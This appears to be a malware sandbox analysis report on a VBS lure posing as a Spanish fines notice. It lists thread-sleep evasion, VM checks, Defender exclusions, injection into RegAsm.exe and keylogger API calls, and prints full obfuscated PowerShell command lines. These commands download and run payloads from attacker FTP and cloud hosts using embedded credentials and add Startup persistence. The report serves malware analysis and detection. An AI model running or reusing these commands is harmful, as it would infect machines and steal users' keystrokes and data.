Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5988	Thread sleep time: -16602069666338586s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1200	Thread sleep count: 7154 > 30	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3176	Thread sleep count: 1798 > 30	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6332	Thread sleep time: -7378697629483816s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6556	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 380	Thread sleep count: 6961 > 30	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6104	Thread sleep count: 1598 > 30	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4288	Thread sleep time: -9223372036854770s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3224	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6464	Thread sleep count: 1296 > 30	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1784	Thread sleep time: -1844674407370954s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4464	Thread sleep count: 35 > 30	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2820	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5296	Thread sleep count: 401 > 30	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4072	Thread sleep count: 67 > 30	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3524	Thread sleep time: -30000s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5548	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 7216	Thread sleep time: -2340000s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 7216	Thread sleep time: -3711000s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7508	Thread sleep count: 838 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7504	Thread sleep count: 251 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7524	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 7564	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7744	Thread sleep count: 680 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7760	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 7804	Thread sleep time: -922337203685477s >= -30000s

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Last function: Thread delayed
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 922337203685477

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData	Jump to behavior

Source: wscript.exe, 00000000.00000003.2074794521.000001EBC1D10000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\usage o
Source: powershell.exe, 00000004.00000002.2236815480.000001D39306F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2236815480.000001D39440D000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Hyper-V
Source: powershell.exe, 00000004.00000002.2236815480.000001D39440D000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Hyper-V
Source: powershell.exe, 00000017.00000002.2422086929.0000020956771000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: _NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}werShell.lnk
Source: powershell.exe, 00000017.00000002.2756232396.0000020970B86000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: powershell.exe, 00000004.00000002.2236815480.000001D39440D000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: vmtoolsd
Source: powershell.exe, 00000017.00000002.2756232396.0000020970B86000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWb
Source: powershell.exe, 00000004.00000002.2911305481.000001D3AB3B2000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2444391639.0000020A424F2000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000F.00000002.3047042436.0000000005D30000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.2654257361.00000207A7AF9000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Memory allocated: page read and write | page guard

HIPS / PFW / Operating System Protection Evasion

Yara detected Powershell download and execute

Source: Yara match	File source: amsi64_1088.amsi.csv, type: OTHER
Source: Yara match	File source: Process Memory Space: powershell.exe PID: 2748, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: powershell.exe PID: 1088, type: MEMORYSTR

.NET source code references suspicious native API functions

Source: 12.2.powershell.exe.20a2a7d7a88.0.raw.unpack, Class1.cs	Reference to suspicious API methods: Conversions.ToGenericParameter<_FDD0>((object)Marshal.GetDelegateForFunctionPointer(GetProcAddress(LoadLibraryA(ref _FDD0), ref _FDD1), typeof(_FDD0)))
Source: 12.2.powershell.exe.20a2a7d7a88.0.raw.unpack, Class1.cs	Reference to suspicious API methods: Conversions.ToGenericParameter<_FDD0>((object)Marshal.GetDelegateForFunctionPointer(GetProcAddress(LoadLibraryA(ref _FDD0), ref _FDD1), typeof(_FDD0)))
Source: 12.2.powershell.exe.20a2a7dbe00.1.raw.unpack, Program.cs	Reference to suspicious API methods: capGetDriverDescriptionA(wDriver, ref lpszName, cbName, ref lpszVer, 100)
Source: 12.2.powershell.exe.20a2a7dbe00.1.raw.unpack, Keylogger.cs	Reference to suspicious API methods: MapVirtualKey(a, 0u)
Source: 12.2.powershell.exe.20a2a7dbe00.1.raw.unpack, Keylogger.cs	Reference to suspicious API methods: GetAsyncKeyState(num2)

Adds a directory exclusion to Windows Defender

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell $S = 'C:\Windows\System32\WindowsPowerShell\v1.0' ; Add-MpPreference -ExclusionPath $S -force ;
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell $S = 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe' ; Add-MpPreference -ExclusionPath $S -force ;
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell $S = 'C:\Windows\System32\WindowsPowerShell\v1.0' ; Add-MpPreference -ExclusionPath $S -force ;	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell $S = 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe' ; Add-MpPreference -ExclusionPath $S -force ;	Jump to behavior

Bypasses PowerShell execution policy

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -ExecutionPolicy Bypass -file "C:\Users\user\AppData\Local\Microsoft\LocalLow\System Update\\x2.ps1"

Injects a PE file into a foreign processes

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 value starts with: 4D5A	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 value starts with: 4D5A
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 value starts with: 4D5A

Writes to foreign memory regions

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 402000	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 408000	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 40A000	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 8ED008	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 402000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 408000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 40A000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 1074008
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 402000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 408000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 40A000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: A77008

Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$qKKzc = 'OwB9???Ds???KQ???g???Ck???I??????n???GU???dQBy???HQ???Jw???g???Cw???I???BY???F??????VQB1???Gg???J??????g???Cw???I??????n???Gg???d???B0???H??????cw???6???C8???LwBm???Gk???cgBl???GI???YQBz???GU???cwB0???G8???cgBh???Gc???ZQ???u???Gc???bwBv???Gc???b???Bl???GE???c???Bp???HM???LgBj???G8???bQ???v???HY???M??????v???GI???LwBk???GU???cwBj???GE???cgBn???GE???cw???t???GQ???Yw???0???GQ???Ng???u???GE???c???Bw???HM???c???Bv???HQ???LgBj???G8???bQ???v???G8???LwBl???G4???dgBp???G8???cw???t???G4???dQBl???HY???bwBz???C4???d???B4???HQ???PwBh???Gw???d??????9???G0???ZQBk???Gk???YQ???m???HQ???bwBr???GU???bg???9???GM???ZQ???2???Dk???M???Bh???DY???M??????t???Dc???O???Bl???GI???LQ???0???D??????MQBi???C0???YgBm???GM???Ng???t???DE???Z???Bj???Dg???Mg???1???GU???MQ???5???DQ???Yg???y???Cc???I??????o???C??????XQBd???Fs???d???Bj???GU???agBi???G8???Ww???g???Cw???I???Bs???Gw???dQBu???CQ???I??????o???GU???awBv???HY???bgBJ???C4???KQ???g???Cc???SQBW???EY???cgBw???Cc???I??????o???GQ???bwBo???HQ???ZQBN???HQ???ZQBH???C4???KQ???n???DE???cwBz???GE???b???BD???C4???MwB5???HI???YQBy???GI???aQBM???HM???cwBh???Gw???Qw???n???Cg???ZQBw???Hk???V???B0???GU???Rw???u???Ck???I???Ba???GM???QgBj???GE???J??????g???Cg???Z???Bh???G8???T??????u???G4???aQBh???G0???bwBE???HQ???bgBl???HI???cgB1???EM???Og???6???F0???bgBp???GE???bQBv???EQ???c???Bw???EE???LgBt???GU???d???Bz???Hk???UwBb???Ds???KQ???g???Ck???I??????n???EE???Jw???g???Cw???I??????n???JMhOgCTISc???I??????o???GU???YwBh???Gw???c???Bl???FI???LgBn???FM???egBD???EI???b??????k???C??????K???Bn???G4???aQBy???HQ???Uw???0???DY???ZQBz???GE???QgBt???G8???cgBG???Do???OgBd???HQ???cgBl???HY???bgBv???EM???LgBt???GU???d???Bz???Hk???UwBb???C??????PQ???g???Fo???YwBC???GM???YQ???k???C??????XQBd???Fs???ZQB0???Hk???QgBb???Ds???Jw???l???Ek???a???Bx???FI???W??????l???Cc???I??????9???C??????W???BQ???FU???dQBo???CQ???Ow???p???C??????ZwBT???Ho???QwBC???Gw???J??????g???Cg???ZwBu???Gk???cgB0???FM???Z???Bh???G8???b???Bu???Hc???bwBE???C4???egB0???Hg???a??????k???C??????PQ???g???Gc???UwB6???EM???QgBs???CQ???Ow???4???EY???V???BV???Do???OgBd???Gc???bgBp???GQ???bwBj???G4???RQ???u???HQ???e???Bl???FQ???LgBt???GU???d???Bz???Hk???UwBb???C??????PQ???g???Gc???bgBp???GQ???bwBj???G4???RQ???u???Ho???d???B4???Gg???J??????7???Ck???d???Bu???GU???aQBs???EM???YgBl???Fc???LgB0???GU???Tg???g???HQ???YwBl???Go???YgBP???C0???dwBl???E4???K??????g???D0???I???B6???HQ???e???Bo???CQ???Ow???p???Cg???ZQBz???G8???c???Bz???Gk???Z??????u???Ho???d???B4???Gg???J??????7???Ck???I??????n???HQ???e???B0???C4???MQ???w???Ew???T???BE???C8???MQ???w???C8???cgBl???HQ???c???B5???HI???YwBw???FU???LwBy???GI???LgBt???G8???Yw???u???HQ???YQBy???GI???dgBr???GM???cwBl???GQ???LgBw???HQ???ZgB??????DE???d???Bh???HI???YgB2???Gs???YwBz???GU???Z??????v???C8???OgBw???HQ???Zg???n???C??????K???Bn???G4???aQBy???HQ???UwBk???GE???bwBs???G4???dwBv???EQ???LgB6???HQ???e???Bo???CQ???I??????9???C??????ZwBT???Ho???Qw	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "; $ZEnbP = $host.Version.Major.Equals(2) ;if ( $ZEnbP ) {$DxTJN = [System.IO.Path]::GetTempPath();del ( $DxTJN + '\Upwin.msu' );$gUKxo = 'https://drive.google.com/uc?export=download&id=';$qVCNu = $env:PROCESSOR_ARCHITECTURE.Contains('64') ;if ( $qVCNu ) {$gUKxo = ($gUKxo + '1NaqdNXiGvI_q1RPkazFtMygmaqTJXu42') ;}else {$gUKxo = ($gUKxo + '1g1jmXusX9mc9VmhVrJJ2XofZ3aK_cLOt') ;};$jVyJn = (New-Object Net.WebClient);$jVyJn.Encoding = [System.Text.Encoding]::UTF8;$jVyJn.DownloadFile($URLKB, $DxTJN + '\Upwin.msu');$MYnKZ = ('C:\Users\' + [Environment]::UserName );RiWcG = ($DxTJN + '\Upwin.msu'); powershell.exe wusa.exe RiWcG /quiet /norestart ; Copy-Item 'C:\Users\user\Desktop\Oficio notificacion multas y sanciones.vbs' -Destination ( $MYnKZ + '\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup' ) -force ;powershell.exe -command 'sleep 180'; shutdown.exe /r /t 0 /f }else {[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true};[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12;$lBCzSg;$hxtz = (New-Object Net.WebClient);$hxtz.Encoding = [System.Text.Encoding]::UTF8;$hxtz.Credentials = new-object System.Net.NetworkCredential((-join [char[]](100,101,115,99,107,118,98,114,97,116,49)),'developerpro21578Jp@@');$lBCzSg = $hxtz.DownloadString( 'ftp://desckvbrat1@ftp.desckvbrat.com.br/Upcrypter/01/DLL01.txt' );$hxtz.dispose();$hxtz = (New-Object Net.WebClient);$hxtz.Encoding = [System.Text.Encoding]::UTF8;$lBCzSg = $hxtz.DownloadString( $lBCzSg );$huUPX = 'C:\Users\user\Desktop\Oficio notificacion multas y sanciones.vbs';[Byte[]] $acBcZ = [System.Convert]::FromBase64String( $lBCzSg.Replace( '?:?' , 'A' ) );[System.AppDomain]::CurrentDomain.Load( $acBcZ ).GetType('ClassLibrary3.Class1').GetMethod( 'prFVI' ).Invoke( $null , [object[]] ( '2b491e528cd1-6cfb-b104-be87-06a096ec=nekot&aidem=tla?txt.soveun-soivne/o/moc.topsppa.6d4cd-sagracsed/b/0v/moc.sipaelgoog.egarotsesaberif//:sptth' , $huUPX , 'true' ) );};"	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -Comman ". 'C:\Users\user\AppData\Local\Microsoft\LocalLow\System Update\yoexw.ps1' ";exit
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -Comman ". 'C:\Users\user\AppData\Local\Microsoft\LocalLow\System Update\yoexw.ps1' ";exit
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"

Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -command "$qkkzc = 'owb9???ds???kq???g???ck???i??????n???gu???dqby???hq???jw???g???cw???i???by???f??????vqb1???gg???j??????g???cw???i??????n???gg???d???b0???h??????cw???6???c8???lwbm???gk???cgbl???gi???yqbz???gu???cwb0???g8???cgbh???gc???zq???u???gc???bwbv???gc???b???bl???ge???c???bp???hm???lgbj???g8???bq???v???hy???m??????v???gi???lwbk???gu???cwbj???ge???cgbn???ge???cw???t???gq???yw???0???gq???ng???u???ge???c???bw???hm???c???bv???hq???lgbj???g8???bq???v???g8???lwbl???g4???dgbp???g8???cw???t???g4???dqbl???hy???bwbz???c4???d???b4???hq???pwbh???gw???d??????9???g0???zqbk???gk???yq???m???hq???bwbr???gu???bg???9???gm???zq???2???dk???m???bh???dy???m??????t???dc???o???bl???gi???lq???0???d??????mqbi???c0???ygbm???gm???ng???t???de???z???bj???dg???mg???1???gu???mq???5???dq???yg???y???cc???i??????o???c??????xqbd???fs???d???bj???gu???agbi???g8???ww???g???cw???i???bs???gw???dqbu???cq???i??????o???gu???awbv???hy???bgbj???c4???kq???g???cc???sqbw???ey???cgbw???cc???i??????o???gq???bwbo???hq???zqbn???hq???zqbh???c4???kq???n???de???cwbz???ge???b???bd???c4???mwb5???hi???yqby???gi???aqbm???hm???cwbh???gw???qw???n???cg???zqbw???hk???v???b0???gu???rw???u???ck???i???ba???gm???qgbj???ge???j??????g???cg???z???bh???g8???t??????u???g4???aqbh???g0???bwbe???hq???bgbl???hi???cgb1???em???og???6???f0???bgbp???ge???bqbv???eq???c???bw???ee???lgbt???gu???d???bz???hk???uwbb???ds???kq???g???ck???i??????n???ee???jw???g???cw???i??????n???jmhogctisc???i??????o???gu???ywbh???gw???c???bl???fi???lgbn???fm???egbd???ei???b??????k???c??????k???bn???g4???aqby???hq???uw???0???dy???zqbz???ge???qgbt???g8???cgbg???do???ogbd???hq???cgbl???hy???bgbv???em???lgbt???gu???d???bz???hk???uwbb???c??????pq???g???fo???ywbc???gm???yq???k???c??????xqbd???fs???zqb0???hk???qgbb???ds???jw???l???ek???a???bx???fi???w??????l???cc???i??????9???c??????w???bq???fu???dqbo???cq???ow???p???c??????zwbt???ho???qwbc???gw???j??????g???cg???zwbu???gk???cgb0???fm???z???bh???g8???b???bu???hc???bwbe???c4???egb0???hg???a??????k???c??????pq???g???gc???uwb6???em???qgbs???cq???ow???4???ey???v???bv???do???ogbd???gc???bgbp???gq???bwbj???g4???rq???u???hq???e???bl???fq???lgbt???gu???d???bz???hk???uwbb???c??????pq???g???gc???bgbp???gq???bwbj???g4???rq???u???ho???d???b4???gg???j??????7???ck???d???bu???gu???aqbs???em???ygbl???fc???lgb0???gu???tg???g???hq???ywbl???go???ygbp???c0???dwbl???e4???k??????g???d0???i???b6???hq???e???bo???cq???ow???p???cg???zqbz???g8???c???bz???gk???z??????u???ho???d???b4???gg???j??????7???ck???i??????n???hq???e???b0???c4???mq???w???ew???t???be???c8???mq???w???c8???cgbl???hq???c???b5???hi???ywbw???fu???lwby???gi???lgbt???g8???yw???u???hq???yqby???gi???dgbr???gm???cwbl???gq???lgbw???hq???zgb??????de???d???bh???hi???ygb2???gs???ywbz???gu???z??????v???c8???ogbw???hq???zg???n???c??????k???bn???g4???aqby???hq???uwbk???ge???bwbs???g4???dwbv???eq???lgb6???hq???e???bo???cq???i??????9???c??????zwbt???ho???qw
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" "; $zenbp = $host.version.major.equals(2) ;if ( $zenbp ) {$dxtjn = [system.io.path]::gettemppath();del ( $dxtjn + '\upwin.msu' );$gukxo = 'https://drive.google.com/uc?export=download&id=';$qvcnu = $env:processor_architecture.contains('64') ;if ( $qvcnu ) {$gukxo = ($gukxo + '1naqdnxigvi_q1rpkazftmygmaqtjxu42') ;}else {$gukxo = ($gukxo + '1g1jmxusx9mc9vmhvrjj2xofz3ak_clot') ;};$jvyjn = (new-object net.webclient);$jvyjn.encoding = [system.text.encoding]::utf8;$jvyjn.downloadfile($urlkb, $dxtjn + '\upwin.msu');$mynkz = ('c:\users\' + [environment]::username );riwcg = ($dxtjn + '\upwin.msu'); powershell.exe wusa.exe riwcg /quiet /norestart ; copy-item 'c:\users\user\desktop\oficio notificacion multas y sanciones.vbs' -destination ( $mynkz + '\appdata\roaming\microsoft\windows\start menu\programs\startup' ) -force ;powershell.exe -command 'sleep 180'; shutdown.exe /r /t 0 /f }else {[system.net.servicepointmanager]::servercertificatevalidationcallback = {$true};[system.net.servicepointmanager]::securityprotocol = [system.net.securityprotocoltype]::tls12;$lbczsg;$hxtz = (new-object net.webclient);$hxtz.encoding = [system.text.encoding]::utf8;$hxtz.credentials = new-object system.net.networkcredential((-join [char[]](100,101,115,99,107,118,98,114,97,116,49)),'developerpro21578jp@@');$lbczsg = $hxtz.downloadstring( 'ftp://desckvbrat1@ftp.desckvbrat.com.br/upcrypter/01/dll01.txt' );$hxtz.dispose();$hxtz = (new-object net.webclient);$hxtz.encoding = [system.text.encoding]::utf8;$lbczsg = $hxtz.downloadstring( $lbczsg );$huupx = 'c:\users\user\desktop\oficio notificacion multas y sanciones.vbs';[byte[]] $acbcz = [system.convert]::frombase64string( $lbczsg.replace( '?:?' , 'a' ) );[system.appdomain]::currentdomain.load( $acbcz ).gettype('classlibrary3.class1').getmethod( 'prfvi' ).invoke( $null , [object[]] ( '2b491e528cd1-6cfb-b104-be87-06a096ec=nekot&aidem=tla?txt.soveun-soivne/o/moc.topsppa.6d4cd-sagracsed/b/0v/moc.sipaelgoog.egarotsesaberif//:sptth' , $huupx , 'true' ) );};"
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -command "$qkkzc = 'owb9???ds???kq???g???ck???i??????n???gu???dqby???hq???jw???g???cw???i???by???f??????vqb1???gg???j??????g???cw???i??????n???gg???d???b0???h??????cw???6???c8???lwbm???gk???cgbl???gi???yqbz???gu???cwb0???g8???cgbh???gc???zq???u???gc???bwbv???gc???b???bl???ge???c???bp???hm???lgbj???g8???bq???v???hy???m??????v???gi???lwbk???gu???cwbj???ge???cgbn???ge???cw???t???gq???yw???0???gq???ng???u???ge???c???bw???hm???c???bv???hq???lgbj???g8???bq???v???g8???lwbl???g4???dgbp???g8???cw???t???g4???dqbl???hy???bwbz???c4???d???b4???hq???pwbh???gw???d??????9???g0???zqbk???gk???yq???m???hq???bwbr???gu???bg???9???gm???zq???2???dk???m???bh???dy???m??????t???dc???o???bl???gi???lq???0???d??????mqbi???c0???ygbm???gm???ng???t???de???z???bj???dg???mg???1???gu???mq???5???dq???yg???y???cc???i??????o???c??????xqbd???fs???d???bj???gu???agbi???g8???ww???g???cw???i???bs???gw???dqbu???cq???i??????o???gu???awbv???hy???bgbj???c4???kq???g???cc???sqbw???ey???cgbw???cc???i??????o???gq???bwbo???hq???zqbn???hq???zqbh???c4???kq???n???de???cwbz???ge???b???bd???c4???mwb5???hi???yqby???gi???aqbm???hm???cwbh???gw???qw???n???cg???zqbw???hk???v???b0???gu???rw???u???ck???i???ba???gm???qgbj???ge???j??????g???cg???z???bh???g8???t??????u???g4???aqbh???g0???bwbe???hq???bgbl???hi???cgb1???em???og???6???f0???bgbp???ge???bqbv???eq???c???bw???ee???lgbt???gu???d???bz???hk???uwbb???ds???kq???g???ck???i??????n???ee???jw???g???cw???i??????n???jmhogctisc???i?????